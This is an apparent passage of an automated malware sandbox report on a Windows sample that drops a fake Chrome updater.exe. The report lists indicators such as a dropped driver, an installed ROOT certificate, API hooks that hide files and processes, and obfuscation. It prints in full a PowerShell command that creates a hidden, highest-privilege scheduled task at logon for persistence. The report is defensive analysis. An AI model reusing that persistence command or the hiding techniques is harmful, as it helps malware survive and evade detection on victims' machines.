Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: WINLOA~1.PDB source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC04C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000010.00000002.2962181517.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811264979.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000010.00000002.2963911331.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811343209.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000010.00000002.2965617934.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000010.00000000.1811378915.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lbfytpia#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'HtfsFileManager' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'HtfsFileManager' -RunLevel 'Highest' -Force; }	Jump to behavior

PE file contains an invalid checksum

Source: updater.exe.0.dr	Static PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
Source: ylVAEHbMLf.exe	Static PE information: real checksum: 0x5b59b2 should be: 0x5bad0c
Source: yfiogronfirx.tmp.0.dr	Static PE information: real checksum: 0x25e65 should be: 0x2b1bf

PE file contains sections with non-standard names

Source: ylVAEHbMLf.exe	Static PE information: section name: .xdata
Source: updater.exe.0.dr	Static PE information: section name: .xdata
Source: yfiogronfirx.tmp.0.dr	Static PE information: section name: .xdata

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B6DD2A5 pushad ; iretd	5_2_00007FFD9B6DD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FFD9B7F000C pushad ; iretd	5_2_00007FFD9B7F00C1
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6222B8 push rdx; retf	7_2_00000225DC6222B9
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6284FD push rcx; retf 003Fh	7_2_00000225DC6284FE
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6594FD push rcx; retf 003Fh	7_2_00000225DC6594FE
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6822B8 push rdx; retf	7_2_00000225DC6822B9
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6884FD push rcx; retf 003Fh	7_2_00000225DC6884FE
Source: C:\Windows\System32\winlogon.exe	Code function: 7_2_00000225DC6B94FD push rcx; retf 003Fh	7_2_00000225DC6B94FE
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AC22B8 push rdx; retf	8_2_00000202C0AC22B9
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AC84FD push rcx; retf 003Fh	8_2_00000202C0AC84FE
Source: C:\Windows\System32\lsass.exe	Code function: 8_2_00000202C0AF94FD push rcx; retf 003Fh	8_2_00000202C0AF94FE
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612E22B8 push rdx; retf	9_2_000002A6612E22B9
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6612E84FD push rcx; retf 003Fh	9_2_000002A6612E84FE
Source: C:\Windows\System32\svchost.exe	Code function: 9_2_000002A6613194FD push rcx; retf 003Fh	9_2_000002A6613194FE
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2722B8 push rdx; retf	10_2_000002BAAE2722B9
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2784FD push rcx; retf 003Fh	10_2_000002BAAE2784FE
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAE2A94FD push rcx; retf 003Fh	10_2_000002BAAE2A94FE
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED922B8 push rdx; retf	10_2_000002BAAED922B9
Source: C:\Windows\System32\dwm.exe	Code function: 10_2_000002BAAED984FD push rcx; retf 003Fh	10_2_000002BAAED984FE
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879A84FD push rcx; retf 003Fh	11_2_0000026A879A84FE
Source: C:\Windows\System32\svchost.exe	Code function: 11_2_0000026A879A22B8 push rdx; retf	11_2_0000026A879A22B9
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537884FD push rcx; retf 003Fh	12_2_00000179537884FE
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537822B8 push rdx; retf	12_2_00000179537822B9
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_00000179537B94FD push rcx; retf 003Fh	12_2_00000179537B94FE
Source: C:\Windows\System32\svchost.exe	Code function: 12_2_0000017953D594FD push rcx; retf 003Fh	12_2_0000017953D594FE
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5422B8 push rdx; retf	13_2_000002295D5422B9
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5484FD push rcx; retf 003Fh	13_2_000002295D5484FE
Source: C:\Windows\System32\svchost.exe	Code function: 13_2_000002295D5794FD push rcx; retf 003Fh	13_2_000002295D5794FE
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067E22B8 push rdx; retf	14_2_00000253067E22B9
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_00000253067E84FD push rcx; retf 003Fh	14_2_00000253067E84FE
Source: C:\Windows\System32\svchost.exe	Code function: 14_2_0000025306E794FD push rcx; retf 003Fh	14_2_0000025306E794FE

Persistence and Installation Behavior

Installs new ROOT certificates

Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior
Source: C:\Windows\System32\lsass.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob			Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe

File created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

Jump to behavior

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR

Drops PE files

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	File created: C:\Users\user\AppData\Local\Temp\yfiogronfirx.tmp			Jump to dropped file
Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	File created: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe			Jump to dropped file

Boot Survival

Yara detected PersistenceViaHiddenTask

Source: Yara match	File source: 0000000F.00000002.2995389438.000001845B502000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000000.1804050356.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3020568430.000001845BC48000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 1044, type: MEMORYSTR

Hooking and other Techniques for Hiding and Protection

Found hidden mapped module (file has been removed from disk)

Source: C:\Users\user\Desktop\ylVAEHbMLf.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP
Source: C:\Users\user\AppData\Roaming\Google\Chrome\updater.exe	Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\YFIOGRONFIRX.TMP

Hooks files or directories query functions (used to hide files and directories)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile

Hooks processes query functions (used to hide processes)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation

Hooks registry keys query functions (used to hide registry keys)

Source: explorer.exe

IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Modifies the prolog of user mode functions (user mode inline hooks)

Source: explorer.exe

User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF

Stores large binary data to the registry

Source: C:\Windows\System32\lsass.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
